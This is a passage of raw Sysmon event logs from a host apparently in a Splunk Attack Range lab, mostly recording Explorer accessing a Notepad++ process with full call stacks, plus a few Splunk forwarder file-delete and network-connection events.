Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.038{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.038{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.038{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.037{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.002{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001047383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.002{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001047382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8 23542300x8000000000000000806922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:30.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A3657062EEA4E26902E97A91BBD8157,SHA256=E42BEC63B20611C9A35D85B47CC25FA7113FCD0B0489EA6A1FCF51CB171C3C1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:22.706{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50969-false10.0.1.12-8000- 23542300x80000000000000001047438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:30.003{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C79775C4137A6D67CC4D6AD7F805A3F,SHA256=2DBC077B66BC398B1B9FA56409267CB4746A78DA630C21A8C4214384DE0C0ED8,IMPHASH=00000000000000000000000000000000falsetrue 